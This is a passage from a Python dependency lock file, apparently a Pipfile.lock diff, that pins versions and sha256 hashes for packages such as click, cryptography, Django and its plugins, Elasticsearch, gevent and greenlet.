"sha256:7a4826ad2bd6b07ca615c74ab91f32f6c96d08f6fcc3902ceeedaec8cdc3bcd6", + "sha256:7c70087bfee18a42b4040bb9ec1ca15a08242cf5867c58726530bdf3945672ed", + "sha256:855eafa5d5a2034b4621c74925d89c5efef61418570e5ef9b37717d9c796419c", + "sha256:8700f06d0ce6f128de3ccdbc1acaea1ee264d2caa9ca05daaf492fde7c2a7200", + "sha256:89f1b185a01fe560bc8ae5f619e924407efca2191b56ce749ec84982fc59a32a", + "sha256:8b2c760cfc7042b27ebdb4a43a4453bd829a5742503599144d54a032c5dc7e9e", + "sha256:8c2f5e83493748286002f9369f3e6607c565a6a90425a3a1fef5ae32a36d749d", + "sha256:8e098148dd37b4ce3baca71fb394c81dc5d9c7728c95df695d2dca218edf40e6", + "sha256:94aea8eff76ee6d1cdacb07dd2123a68283cb5569e0250feab1240058f53b623", + "sha256:95eb302ff792e12aba9a8b8f8474ab229a83c103d74a750ec0bd1c1eea32e669", + "sha256:9bd9b3b31adcb054116447ea22caa61a285d92e94d710aa5ec97992ff5eb7cf3", + "sha256:9e608aafdb55eb9f255034709e20d5a83b6d60c054df0802fa9c9883d0a937aa", + "sha256:a103b3a7069b62f5d4890ae1b8f0597618f628b286b03d4bc9195230b154bfa9", + "sha256:a386ebe437176aab38c041de1260cd3ea459c6ce5263594399880bbc398225b2", + "sha256:a38856a971c602f98472050165cea2cdc97709240373041b69030be15047691f", + "sha256:a401b4598e5d3f4a9a811f3daf42ee2291790c7f9d74b18d75d6e21dda98a1a1", + "sha256:a7647ebdfb9682b7bb97e2a5e7cb6ae735b1c25008a70b906aecca294ee96cf4", + "sha256:aaf63899c94de41fe3cf934601b0f7ccb6b428c6e4eeb80da72c58eab077b19a", + "sha256:b0dac0ff919ba34d4df1b6131f59ce95b08b9065233446be7e459f95554c0dc8", + "sha256:baacc6aee0b2ef6f3d308e197b5d7a81c0e70b06beae1f1fcacffdbd124fe0e3", + "sha256:bf420121d4c8dce6b889f0e8e4ec0ca34b7f40186203f06a946fa0276ba54029", + "sha256:c04a46716adde8d927adb9457bbe39cf473e1e2c2f5d0a16ceb837e5d841ad4f", + "sha256:c0b21078a4b56965e2b12f247467b234734491897e99c1d51cee628da9786959", + "sha256:c1c76a1743432b4b60ab3358c937a3fe1341c828ae6194108a94c69028247f22", + "sha256:c4983bf937209c57240cff65906b18bb35e64ae872da6a0db937d7b4af845dd7", + "sha256:c4fb39a81950ec280984b3a44f5bd12819953dc5fa3a7e6fa7a80db5ee853952", + "sha256:c57921cda3a80d0f2b8aec7e25c8aa14479ea92b5b51b6876d975d925a2ea346", + "sha256:c8063cf17b19661471ecbdb3df1c84f24ad2e389e326ccaf89e3fb2484d8dd7e", + "sha256:ccd16eb18a849fd8dcb23e23380e2f0a354e8daa0c984b8a732d9cfaba3a776d", + "sha256:cd6dbe0238f7743d0efe563ab46294f54f9bc8f4b9bcf57c3c666cc5bc9d1299", + "sha256:d62e51710986674142526ab9f78663ca2b0726066ae26b78b22e0f5e571238dd", + "sha256:db901e2ac34c931d73054d9797383d0f8009991e723dab15109740a63e7f902a", + "sha256:e03b8895a6990c9ab2cdcd0f2fe44088ca1c65ae592b8f795c3294af00a461c3", + "sha256:e1c8a2f4c69e08e89632defbfabec2feb8a8d99edc9f89ce33c4b9e36ab63037", + "sha256:e4b749b9cc6ee664a3300bb3a273c1ca8068c46be705b6c31cf5d276f8628a94", + "sha256:e6a5bf2cba5ae1bb80b154ed68a3cfa2fa00fde979a7f50d6598d3e17d9ac20c", + "sha256:e857a2232ba53ae940d3456f7533ce6ca98b81917d47adc3c7fd55dad8fab858", + "sha256:ee4006268ed33370957f55bf2e6f4d263eaf4dc3cfc473d1d90baff6ed36ce4a", + "sha256:eef9df1eefada2c09a5e7a40991b9fc6ac6ef20b1372abd48d2794a316dc0449", + "sha256:f058f6963fd82eb143c692cecdc89e075fa0828db2e5b291070485390b2f1c9c", + "sha256:f25c229a6ba38a35ae6e25ca1264621cc25d4d38dca2942a7fce0b67a4efe918", + "sha256:f2a1d0fd4242bd8643ce6f98927cf9c04540af6efa92323e9d3124f57727bfc1", + "sha256:f7560358a6811e52e9c4d142d497f1a6e10103d3a6881f18d04dbce3729c0e2c", + "sha256:f779d3ad205f108d14e99bb3859aa7dd8e9c68874617c72354d7ecaec2a054ac", + "sha256:f87f746ee241d30d6ed93969de31e5ffd09a2961a051e60ae6bddde9ec3583aa" + ], + "markers": "python_full_version >= '3.7.0'", + "version": "==3.2.0" + }, + "click": { + "hashes": [ + "sha256:ae74fb96c20a0277a1d615f1e4d73c8414f5a98db8b799a7931d1582f3390c28", + "sha256:ca9853ad459e787e2192211578cc907e7594e294c7ccc834310722b41b9ca6de" + ], + "markers": "python_version >= '3.7'", + "version": "==8.1.7" + }, + "click-didyoumean": { + "hashes": [ + "sha256:a0713dc7a1de3f06bc0df5a9567ad19ead2d3d5689b434768a6145bff77c0667", + "sha256:f184f0d851d96b6d29297354ed981b7dd71df7ff500d82fa6d11f0856bee8035" + ], + "markers": "python_full_version >= '3.6.2' and python_full_version < '4.0.0'", + "version": "==0.3.0" + }, + "click-plugins": { + "hashes": [ + "sha256:46ab999744a9d831159c3411bb0c79346d94a444df9a3a3742e9ed63645f264b", + "sha256:5d262006d3222f5057fd81e1623d4443e41dcda5dc815c06b442aa3c02889fc8" + ], + "version": "==1.1.1" + }, + "click-repl": { + "hashes": [ + "sha256:17849c23dba3d667247dc4defe1757fff98694e90fe37474f3feebb69ced26a9", + "sha256:fb7e06deb8da8de86180a33a9da97ac316751c094c6899382da7feeeeb51b812" + ], + "markers": "python_version >= '3.6'", + "version": "==0.3.0" + }, + "crcmod": { + "hashes": [ + "sha256:50586ab48981f11e5b117523d97bb70864a2a1af246cf6e4f5c4a21ef4611cd1", + "sha256:69a2e5c6c36d0f096a7beb4cd34e5f882ec5fd232efb710cdb85d4ff196bd52e", + "sha256:737fb308fa2ce9aed2e29075f0d5980d4a89bfbec48a368c607c5c63b3efb90e", + "sha256:dc7051a0db5f2bd48665a990d3ec1cc305a466a77358ca4492826f41f283601e" + ], + "version": "==1.7" + }, + "cryptography": { + "hashes": [ + "sha256:0d09fb5356f975974dbcb595ad2d178305e5050656affb7890a1583f5e02a306", + "sha256:23c2d778cf829f7d0ae180600b17e9fceea3c2ef8b31a99e3c694cbbf3a24b84", + "sha256:3fb248989b6363906827284cd20cca63bb1a757e0a2864d4c1682a985e3dca47", + "sha256:41d7aa7cdfded09b3d73a47f429c298e80796c8e825ddfadc84c8a7f12df212d", + "sha256:42cb413e01a5d36da9929baa9d70ca90d90b969269e5a12d39c1e0d475010116", + "sha256:4c2f0d35703d61002a2bbdcf15548ebb701cfdd83cdc12471d2bae80878a4207", + "sha256:4fd871184321100fb400d759ad0cddddf284c4b696568204d281c902fc7b0d81", + "sha256:5259cb659aa43005eb55a0e4ff2c825ca111a0da1814202c64d28a985d33b087", + "sha256:57a51b89f954f216a81c9d057bf1a24e2f36e764a1ca9a501a6964eb4a6800dd", + "sha256:652627a055cb52a84f8c448185922241dd5217443ca194d5739b44612c5e6507", + "sha256:67e120e9a577c64fe1f611e53b30b3e69744e5910ff3b6e97e935aeb96005858", + "sha256:6af1c6387c531cd364b72c28daa29232162010d952ceb7e5ca8e2827526aceae", + "sha256:6d192741113ef5e30d89dcb5b956ef4e1578f304708701b8b73d38e3e1461f34", + "sha256:7efe8041897fe7a50863e51b77789b657a133c75c3b094e51b5e4b5cec7bf906", + "sha256:84537453d57f55a50a5b6835622ee405816999a7113267739a1b4581f83535bd", + "sha256:8f09daa483aedea50d249ef98ed500569841d6498aa9c9f4b0531b9964658922", + "sha256:95dd7f261bb76948b52a5330ba5202b91a26fbac13ad0e9fc8a3ac04752058c7", + "sha256:a74fbcdb2a0d46fe00504f571a2a540532f4c188e6ccf26f1f178480117b33c4", + "sha256:a983e441a00a9d57a4d7c91b3116a37ae602907a7618b882c8013b5762e80574", + "sha256:ab8de0d091acbf778f74286f4989cf3d1528336af1b59f3e5d2ebca8b5fe49e1", + "sha256:aeb57c421b34af8f9fe830e1955bf493a86a7996cc1338fe41b30047d16e962c", + "sha256:ce785cf81a7bdade534297ef9e490ddff800d956625020ab2ec2780a556c313e", + "sha256:d0d651aa754ef58d75cec6edfbd21259d93810b73f6ec246436a21b7841908de" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==41.0.3" + }, + "dataclasses-json": { + "hashes": [ + "sha256:5ec6fed642adb1dbdb4182badb01e0861badfd8fda82e3b67f44b2d1e9d10d21", + "sha256:d82896a94c992ffaf689cd1fafc180164e2abdd415b8f94a7f78586af5886236" + ], + "index": "pypi", + "markers": "python_version < '3.13' and python_version >= '3.7'", + "version": "==0.5.14" + }, + "ddt": { + "hashes": [ + "sha256:e3c93b961a108b4f4d5a6c7f2263513d928baf3bb5b32af8e1c804bfb041141d", + "sha256:f71b348731b8c78c3100bffbd951a769fbd439088d1fdbb3841eee019af80acd" + ], + "index": "pypi", + "version": "==1.6.0" + }, + "defusedxml": { + "hashes": [ + "sha256:1bb3032db185915b62d7c6209c5a8792be6a32ab2fedacc84e01b52c51aa3e69", + "sha256:a352e7e428770286cc899e2542b6cdaedb2b4953ff269a210103ec58f6198a61" + ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", + "version": "==0.7.1" + }, + "diff-match-patch": { + "hashes": [ + "sha256:953019cdb9c9d2c9e47b5b12bcff3cf4746fc4598eb406076fa1fc27e6a1f15c", + "sha256:dce43505fb7b1b317de7195579388df0746d90db07015ed47a85e5e44930ef93" + ], + "markers": "python_version >= '3.7'", + "version": "==20230430" + }, + "django": { + "hashes": [ + "sha256:a477ab326ae7d8807dc25c186b951ab8c7648a3a23f9497763c37307a2b5ef87", + "sha256:dec2a116787b8e14962014bf78e120bba454135108e1af9e9b91ade7b2964c40" + ], + "index": "pypi", + "markers": "python_version >= '3.6'", + "version": "==3.2.20" + }, + "django-add-default-value": { + "hashes": [ + "sha256:514b357f4a5e5c5dd9f02ca42d19d51688ed4a9cac62a7e35d09025f632bba93", + "sha256:a539767f498ab2e3022f98f743aa4473354a24df037859543cd2545f650cadcc" + ], + "index": "pypi", + "version": "==0.10.0" + }, + "django-celery-beat": { + "hashes": [ + "sha256:b8a13afb15e7c53fc04f4f847ac71a6d32088959aba701eb7c4a59f0c28ba543", + "sha256:c4c72a9579f20eff4c4ccf1b58ebdca5ef940f4210065057db1754ea5f8dffdc" + ], + "index": "pypi", + "version": "==2.2.0" + }, + "django-cors-headers": { + "hashes": [ + "sha256:9ada212b0e2efd4a5e339360ffc869cb21ac5605e810afe69f7308e577ea5bde", + "sha256:f9749c6410fe738278bc2b6ef17f05195bc7b251693c035752d8257026af024f" + ], + "index": "pypi", + "markers": "python_version >= '3.8'", + "version": "==4.2.0" + }, + "django-cprofile-middleware": { + "hashes": [ + "sha256:b942185a38f3b582935a55c768f126ce9a6f0cefceee3b5d19e6b307ad129889" + ], + "index": "pypi", + "version": "==1.0.5" + }, + "django-elasticsearch-dsl": { + "hashes": [ + "sha256:3c58a254a6318b169eb904d41d802924b99ea8e53ddc2c596ebba90506cf47fa", + "sha256:811d3909b3387fd55c19d9bbcf0e9a9b234f085df3f8422d59e7519a5f733e0e" + ], + "index": "pypi", + "version": "==7.2.2" + }, + "django-filter": { + "hashes": [ + "sha256:2fe15f78108475eda525692813205fa6f9e8c1caf1ae65daa5862d403c6dbf00", + "sha256:d12d8e0fc6d3eb26641e553e5d53b191eb8cec611427d4bdce0becb1f7c172b5" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==23.2" + }, + "django-health-check": { + "hashes": [ + "sha256:20dc5ccb516a4e7163593fd4026f0a7531e3027b47d23ebe3bd9dbc99ac4354c", + "sha256:d1b8671e79d1de6e3dd1a9c69566222b0bfcfacca8b90511a4407b2d0d3d2778" + ], + "index": "pypi", + "markers": "python_version >= '3.8'", + "version": "==3.17.0" + }, + "django-import-export": { + "hashes": [ + "sha256:c39c003bfc803fb63ba7742562f1667603a4a8d7426261845d75ce8582d40f48", + "sha256:cf6f3dabdd4f32dcb26e25c7ddcba7aee3168b55d380b0da79f0349afa17c011" + ], + "index": "pypi", + "markers": "python_version >= '3.5'", + "version": "==2.5.0" + }, + "django-mock-queries": { + "hashes": [ + "sha256:7ee3f34752e8131479924ea6952fe37c4106cc18e6fc3e5e9b28b333eeda10b3" + ], + "index": "pypi", + "version": "==2.1.7" + }, + "django-modeltranslation": { + "hashes": [ + "sha256:e247840b9038b7e7b2dc6f1b4868dfe88737540883eaed3d4b4775e5bd89c7fd" + ], + "index": "pypi", + "version": "==0.17.7" + }, + "django-prometheus": { + "hashes": [ + "sha256:cf9b26f7ba2e4568f08f8f91480a2882023f5908579681bcf06a4d2465f12168", + "sha256:f9c8b6c780c9419ea01043c63a437d79db2c33353451347894408184ad9c3e1e" + ], + "index": "pypi", + "version": "==2.3.1" + }, + "django-ranged-response": { + "hashes": [ + "sha256:f71fff352a37316b9bead717fc76e4ddd6c9b99c4680cdf4783b9755af1cf985" + ], + "index": "pypi", + "version": "==0.2.0" + }, + "django-redis": { + "hashes": [ + "sha256:1d037dc02b11ad7aa11f655d26dac3fb1af32630f61ef4428860a2e29ff92026", + "sha256:8a99e5582c79f894168f5865c52bd921213253b7fd64d16733ae4591564465de" + ], + "index": "pypi", + "markers": "python_version >= '3.6'", + "version": "==5.2.0" + }, + "django-rest-framework-proxy": { + "hashes": [ + "sha256:f5154c525c851f98680a960f43526de98af545e1cb9b4cfaa08a230fb7f1e58d" + ], + "index": "pypi", + "version": "==1.6.0" + }, + "django-seriously": { + "hashes": [ + "sha256:591a2be6e18c229117e0196d9c8e6bd600f5c52f9eebe868e709c71acb53ef58", + "sha256:771f88a24f6166bdb3a944769fa09e24c317ea1b8f5ee8040d121d30b4395219" + ], + "index": "pypi", + "markers": "python_version >= '3.6'", + "version": "==0.4.3" + }, + "django-silk": { + "hashes": [ + "sha256:2f1fcaaf21192011147537fe1ca72dc9f552f32d7043ebd82aeeda370f194469", + "sha256:50552f06d9306d06517fbeab9a2c74856355e06304f03ed16b6dd353f7c77e7a" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==5.0.3" + }, + "django-simple-captcha": { + "hashes": [ + "sha256:567ad84fa64c86508c679b8425cc1410c44b3cd6467e54f8d31cf077d9366407", + "sha256:6e1fcc4f4005f7d69ee7a2e59a7e863b5d3918f36a85a4d811498984aecc48ce" + ], + "index": "pypi", + "version": "==0.5.18" + }, + "django-stubs": { + "extras": ["compatible-mypy"], + "hashes": [ + "sha256:0bbf9eb172c5b06eccff2d704c7c3906e4a2c6146df8c32ee9f3a51e29265581", + "sha256:25010658acac0ce4a69211b55dd719fd16dbfe54fcfe5c878d0c8db07bdd5482" + ], + "markers": "python_version >= '3.7'", + "version": "==1.15.0" + }, + "django-stubs-ext": { + "hashes": [ + "sha256:c69d1cc46f1c4c3b7894b685a5022c29b2a36c7cfb52e23762eaf357ebfc2c98", + "sha256:fdacc65a14d2d4b97334b58ff178a5853ec8c8c76cec406e417916ad67536ce4" + ], + "markers": "python_version >= '3.8'", + "version": "==4.2.2" + }, + "django-timezone-field": { + "hashes": [ + "sha256:5dd5bd9249382bef8847d3e7e4c32b7be182a4b538f354130d1252ed228892f8", + "sha256:7552d2b0f145684b7de3fb5046101c7efd600cc6ba951b15c630fa1e1b83558e" + ], + "markers": "python_version >= '3.5'", + "version": "==4.2.3" + }, + "django-utils": { + "hashes": [ + "sha256:98b59b368d499b4d1b6dc66f15c0a136833bea12e0b299efdbfd754dc04c79d5" + ], + "index": "pypi", + "version": "==0.0.2" + }, + "django-utils-six": { + "hashes": [ + "sha256:4ef9d20de679a5b2448429476452493661fe08f23d6e788a8e9816ec05e3c5b0", + "sha256:8f0e77289d911069a6a15bab5a25ccf2c0fcb8fc4177461dd17470cfdeb94aa6" + ], + "index": "pypi", + "markers": "python_version >= '3.6' and python_version < '4.0'", + "version": "==2.0" + }, + "django-xff": { + "hashes": [ + "sha256:8935dce34383d65b545564a3cc17dc8010c8cdec231b0932e6073ddc766d679d", + "sha256:d2a34e947e730d0c899b6386b28cf675edafa9d64336cdb8c9656b0a58ed80b6", + "sha256:fc87333f64d2ff2ce4ab6449e814240f9f195c290d2c8789ca81a1c98f5522ec" + ], + "index": "pypi", + "version": "==1.4.0" + }, + "djangorestframework": { + "hashes": [ + "sha256:6d1d59f623a5ad0509fe0d6bfe93cbdfe17b8116ebc8eda86d45f6e16e819aaf", + "sha256:f747949a8ddac876e879190df194b925c177cdeb725a099db1460872f7c0a7f2" + ], + "index": "pypi", + "markers": "python_version >= '3.5'", + "version": "==3.12.4" + }, + "djangorestframework-dataclasses": { + "hashes": [ + "sha256:802300f812a96715079209f8dabecbab0b9716ae34a770db61f51a6897916abf", + "sha256:b061ef12f23394e91107f9b915dec38fb0a69d97a0ac9e62207aa90908375211" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==1.3.0" + }, + "djangorestframework-stubs": { + "extras": ["compatible-mypy"], + "hashes": [ + "sha256:89f6c2add193cb5ab61b9e47187b33a93cc099376a8df5e4d6c3fc8ecb992d3b", + "sha256:9475e1374b057ffbdcaaa84a060fe5f01476d8b9014d82a83b4153f57fbcbc1f" + ], + "markers": "python_version >= '3.7'", + "version": "==1.9.1" + }, + "docxcompose": { + "hashes": [ + "sha256:b1a40d4f95751565822350174971012875f82a32b83a9d1be098edd965047029" + ], + "index": "pypi", + "version": "==1.3.4" + }, + "docxtpl": { + "hashes": [ + "sha256:6ce60f38ce01d1698932bfba5c8b02e14c2cbdfb13c1c1fa15c30c433d88982d", + "sha256:a18e33e2e25a4c63d49cd76a3f1e495e53eb96062ecbc7715a8d8f4540c3195b" + ], + "index": "pypi", + "version": "==0.16.0" + }, + "drf-spectacular": { + "hashes": [ + "sha256:17ac5e31e5d6150dd5fa10843b429202f4f38069202acc44394cc5a771de63d9", + "sha256:866e16ddaae167a1234c76cd8c351161373551db994ce9665b347b32d5daf38b" + ], + "index": "pypi", + "markers": "python_version >= '3.6'", + "version": "==0.22.1" + }, + "elasticsearch": { + "hashes": [ + "sha256:555170b4e13a823f4472bc12a148aef90febd5b90b16be83651d35524f34acb3", + "sha256:ed9c0cd58e05959a56e306ecf444f794da6afde75b213e26758f7a317e5e668c" + ], + "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' and python_version < '4'", + "version": "==7.17.7" + }, + "elasticsearch-dsl": { + "hashes": [ + "sha256:07ee9c87dc28cc3cae2daa19401e1e18a172174ad9e5ca67938f752e3902a1d5", + "sha256:97f79239a252be7c4cce554c29e64695d7ef6a4828372316a5e5ff815e7a7498" + ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==7.4.1" + }, + "et-xmlfile": { + "hashes": [ + "sha256:8eb9e2bc2f8c97e37a2dc85a09ecdcdec9d8a396530a6d5a33b30b9a92da0c5c", + "sha256:a2ba85d1d6a74ef63837eed693bcb89c3f752169b0e3e7ae5b16ca5e1b3deada" + ], + "markers": "python_version >= '3.6'", + "version": "==1.1.0" + }, + "flower": { + "hashes": [ + "sha256:5ab717b979530770c16afb48b50d2a98d23c3e9fe39851dcf6bc4d01845a02a0", + "sha256:9db2c621eeefbc844c8dd88be64aef61e84e2deb29b271e02ab2b5b9f01068e2" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==2.0.1" + }, + "gevent": { + "hashes": [ + "sha256:018f93de7d5318d2fb440f846839a4464738468c3476d5c9cf7da45bb71c18bd", + "sha256:0d581f22a5be6281b11ad6309b38b18f0638cf896931223cbaa5adb904826ef6", + "sha256:1472012493ca1fac103f700d309cb6ef7964dcdb9c788d1768266e77712f5e49", + "sha256:172caa66273315f283e90a315921902cb6549762bdcb0587fd60cb712a9d6263", + "sha256:17b68f4c9e20e47ad49fe797f37f91d5bbeace8765ce2707f979a8d4ec197e4d", + "sha256:1ca01da176ee37b3527a2702f7d40dbc9ffb8cfc7be5a03bfa4f9eec45e55c46", + "sha256:1d543c9407a1e4bca11a8932916988cfb16de00366de5bf7bc9e7a3f61e60b18", + "sha256:1e1286a76f15b5e15f1e898731d50529e249529095a032453f2c101af3fde71c", + "sha256:1e955238f59b2947631c9782a713280dd75884e40e455313b5b6bbc20b92ff73", + "sha256:1f001cac0ba8da76abfeb392a3057f81fab3d67cc916c7df8ea977a44a2cc989", + "sha256:1ff3796692dff50fec2f381b9152438b221335f557c4f9b811f7ded51b7a25a1", + "sha256:2929377c8ebfb6f4d868d161cd8de2ea6b9f6c7a5fcd4f78bcd537319c16190b", + "sha256:319d8b1699b7b8134de66d656cd739b308ab9c45ace14d60ae44de7775b456c9", + "sha256:323b207b281ba0405fea042067fa1a61662e5ac0d574ede4ebbda03efd20c350", + "sha256:3b7eae8a0653ba95a224faaddf629a913ace408edb67384d3117acf42d7dcf89", + "sha256:4114f0f439f0b547bb6f1d474fee99ddb46736944ad2207cef3771828f6aa358", + "sha256:4197d423e198265eef39a0dea286ef389da9148e070310f34455ecee8172c391", + "sha256:494c7f29e94df9a1c3157d67bb7edfa32a46eed786e04d9ee68d39f375e30001", + "sha256:4e2f008c82dc54ec94f4de12ca6feea60e419babb48ec145456907ae61625aa4", + "sha256:53ee7f170ed42c7561fe8aff5d381dc9a4124694e70580d0c02fba6aafc0ea37", + "sha256:54f4bfd74c178351a4a05c5c7df6f8a0a279ff6f392b57608ce0e83c768207f9", + "sha256:58898dbabb5b11e4d0192aae165ad286dc6742c543e1be9d30dc82753547c508", + "sha256:59b47e81b399d49a5622f0f503c59f1ce57b7705306ea0196818951dfc2f36c8", + "sha256:5aa99e4882a9e909b4756ee799c6fa0f79eb0542779fad4cc60efa23ec1b2aa8", + "sha256:6c04ee32c11e9fcee47c1b431834878dc987a7a2cc4fe126ddcae3bad723ce89", + "sha256:84c517e33ed604fa06b7d756dc0171169cc12f7fdd68eb7b17708a62eebf4516", + "sha256:8729129edef2637a8084258cb9ec4e4d5ca45d97ac77aa7a6ff19ccb530ab731", + "sha256:877abdb3a669576b1d51ce6a49b7260b2a96f6b2424eb93287e779a3219d20ba", + "sha256:8c192d2073e558e241f0b592c1e2b34127a4481a5be240cad4796533b88b1a98", + "sha256:8f2477e7b0a903a01485c55bacf2089110e5f767014967ba4b287ff390ae2638", + "sha256:96c56c280e3c43cfd075efd10b250350ed5ffd3c1514ec99a080b1b92d7c8374", + "sha256:97cd42382421779f5d82ec5007199e8a84aa288114975429e4fd0a98f2290f10", + "sha256:98bc510e80f45486ef5b806a1c305e0e89f0430688c14984b0dbdec03331f48b", + "sha256:990d7069f14dc40674e0d5cb43c68fd3bad8337048613b9bb94a0c4180ffc176", + "sha256:9d85574eb729f981fea9a78998725a06292d90a3ed50ddca74530c3148c0be41", + "sha256:a2237451c721a0f874ef89dbb4af4fdc172b76a964befaa69deb15b8fff10f49", + "sha256:a47a4e77e2bc668856aad92a0b8de7ee10768258d93cd03968e6c7ba2e832f76", + "sha256:a5488eba6a568b4d23c072113da4fc0feb1b5f5ede7381656dc913e0d82204e2", + "sha256:ae90226074a6089371a95f20288431cd4b3f6b0b096856afd862e4ac9510cddd", + "sha256:b43d500d7d3c0e03070dee813335bb5315215aa1cf6a04c61093dfdd718640b3", + "sha256:b6c144e08dfad4106effc043a026e5d0c0eff6ad031904c70bf5090c63f3a6a7", + "sha256:d21ad79cca234cdbfa249e727500b0ddcbc7adfff6614a96e6eaa49faca3e4f2", + "sha256:d82081656a5b9a94d37c718c8646c757e1617e389cdc533ea5e6a6f0b8b78545", + "sha256:da4183f0b9d9a1e25e1758099220d32c51cc2c6340ee0dea3fd236b2b37598e4", + "sha256:db562a8519838bddad0c439a2b12246bab539dd50e299ea7ff3644274a33b6a5", + "sha256:ddaa3e310a8f1a45b5c42cf50b54c31003a3028e7d4e085059090ea0e7a5fddd", + "sha256:ed7f16613eebf892a6a744d7a4a8f345bc6f066a0ff3b413e2479f9c0a180193", + "sha256:efc003b6c1481165af61f0aeac248e0a9ac8d880bb3acbe469b448674b2d5281", + "sha256:f01c9adbcb605364694b11dcd0542ec468a29ac7aba2fb5665dc6caf17ba4d7e", + "sha256:f23d0997149a816a2a9045af29c66f67f405a221745b34cefeac5769ed451db8", + "sha256:f3329bedbba4d3146ae58c667e0f9ac1e6f1e1e6340c7593976cdc60aa7d1a47", + "sha256:f7ed2346eb9dc4344f9cb0d7963ce5b74fe16fdd031a2809bb6c2b6eba7ebcd5" + ], + "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4, 3.5'", + "version": "==22.10.2" + }, + "gprof2dot": { + "hashes": [ + "sha256:45b4d298bd36608fccf9511c3fd88a773f7a1abc04d6cd39445b11ba43133ec5", + "sha256:f165b3851d3c52ee4915eb1bd6cca571e5759823c2cd0f71a79bda93c2dc85d6" + ], + "markers": "python_version >= '2.7'", + "version": "==2022.7.29" + }, + "greenlet": { + "hashes": [ + "sha256:03a8f4f3430c3b3ff8d10a2a86028c660355ab637cee9333d63d66b56f09d52a", + "sha256:0bf60faf0bc2468089bdc5edd10555bab6e85152191df713e2ab1fcc86382b5a", + "sha256:18a7f18b82b52ee85322d7a7874e676f34ab319b9f8cce5de06067384aa8ff43", + "sha256:18e98fb3de7dba1c0a852731c3070cf022d14f0d68b4c87a19cc1016f3bb8b33", + "sha256:1a819eef4b0e0b96bb0d98d797bef17dc1b4a10e8d7446be32d1da33e095dbb8", + "sha256:26fbfce90728d82bc9e6c38ea4d038cba20b7faf8a0ca53a9c07b67318d46088", + "sha256:2780572ec463d44c1d3ae850239508dbeb9fed38e294c68d19a24d925d9223ca", + "sha256:283737e0da3f08bd637b5ad058507e578dd462db259f7f6e4c5c365ba4ee9343", + "sha256:2d4686f195e32d36b4d7cf2d166857dbd0ee9f3d20ae349b6bf8afc8485b3645", + "sha256:2dd11f291565a81d71dab10b7033395b7a3a5456e637cf997a6f33ebdf06f8db", + "sha256:30bcf80dda7f15ac77ba5af2b961bdd9dbc77fd4ac6105cee85b0d0a5fcf74df", + "sha256:32e5b64b148966d9cccc2c8d35a671409e45f195864560829f395a54226408d3", + "sha256:36abbf031e1c0f79dd5d596bfaf8e921c41df2bdf54ee1eed921ce1f52999a86", + "sha256:3a06ad5312349fec0ab944664b01d26f8d1f05009566339ac6f63f56589bc1a2", + "sha256:3a51c9751078733d88e013587b108f1b7a1fb106d402fb390740f002b6f6551a", + "sha256:3c9b12575734155d0c09d6c3e10dbd81665d5c18e1a7c6597df72fd05990c8cf", + "sha256:3f6ea9bd35eb450837a3d80e77b517ea5bc56b4647f5502cd28de13675ee12f7", + "sha256:4b58adb399c4d61d912c4c331984d60eb66565175cdf4a34792cd9600f21b394", + "sha256:4d2e11331fc0c02b6e84b0d28ece3a36e0548ee1a1ce9ddde03752d9b79bba40", + "sha256:5454276c07d27a740c5892f4907c86327b632127dd9abec42ee62e12427ff7e3", + "sha256:561091a7be172ab497a3527602d467e2b3fbe75f9e783d8b8ce403fa414f71a6", + "sha256:6c3acb79b0bfd4fe733dff8bc62695283b57949ebcca05ae5c129eb606ff2d74", + "sha256:703f18f3fda276b9a916f0934d2fb6d989bf0b4fb5a64825260eb9bfd52d78f0", + "sha256:7492e2b7bd7c9b9916388d9df23fa49d9b88ac0640db0a5b4ecc2b653bf451e3", + "sha256:76ae285c8104046b3a7f06b42f29c7b73f77683df18c49ab5af7983994c2dd91", + "sha256:7cafd1208fdbe93b67c7086876f061f660cfddc44f404279c1585bbf3cdc64c5", + "sha256:7efde645ca1cc441d6dc4b48c0f7101e8d86b54c8530141b09fd31cef5149ec9", + "sha256:88d9ab96491d38a5ab7c56dd7a3cc37d83336ecc564e4e8816dbed12e5aaefc8", + "sha256:8eab883b3b2a38cc1e050819ef06a7e6344d4a990d24d45bc6f2cf959045a45b", + "sha256:910841381caba4f744a44bf81bfd573c94e10b3045ee00de0cbf436fe50673a6", + "sha256:9190f09060ea4debddd24665d6804b995a9c122ef5917ab26e1566dcc712ceeb", + "sha256:937e9020b514ceedb9c830c55d5c9872abc90f4b5862f89c0887033ae33c6f73", + "sha256:94c817e84245513926588caf1152e3b559ff794d505555211ca041f032abbb6b", + "sha256:971ce5e14dc5e73715755d0ca2975ac88cfdaefcaab078a284fea6cfabf866df", + "sha256:9d14b83fab60d5e8abe587d51c75b252bcc21683f24699ada8fb275d7712f5a9", + "sha256:9f35ec95538f50292f6d8f2c9c9f8a3c6540bbfec21c9e5b4b751e0a7c20864f", + "sha256:a1846f1b999e78e13837c93c778dcfc3365902cfb8d1bdb7dd73ead37059f0d0", + "sha256:acd2162a36d3de67ee896c43effcd5ee3de247eb00354db411feb025aa319857", + "sha256:b0ef99cdbe2b682b9ccbb964743a6aca37905fda5e0452e5ee239b1654d37f2a", + "sha256:b80f600eddddce72320dbbc8e3784d16bd3fb7b517e82476d8da921f27d4b249", + "sha256:b864ba53912b6c3ab6bcb2beb19f19edd01a6bfcbdfe1f37ddd1778abfe75a30", + "sha256:b9ec052b06a0524f0e35bd8790686a1da006bd911dd1ef7d50b77bfbad74e292", + "sha256:ba2956617f1c42598a308a84c6cf021a90ff3862eddafd20c3333d50f0edb45b", + "sha256:bdfea8c661e80d3c1c99ad7c3ff74e6e87184895bbaca6ee8cc61209f8b9b85d", + "sha256:be4ed120b52ae4d974aa40215fcdfde9194d63541c7ded40ee12eb4dda57b76b", + "sha256:c4302695ad8027363e96311df24ee28978162cdcdd2006476c43970b384a244c", + "sha256:c48f54ef8e05f04d6eff74b8233f6063cb1ed960243eacc474ee73a2ea8573ca", + 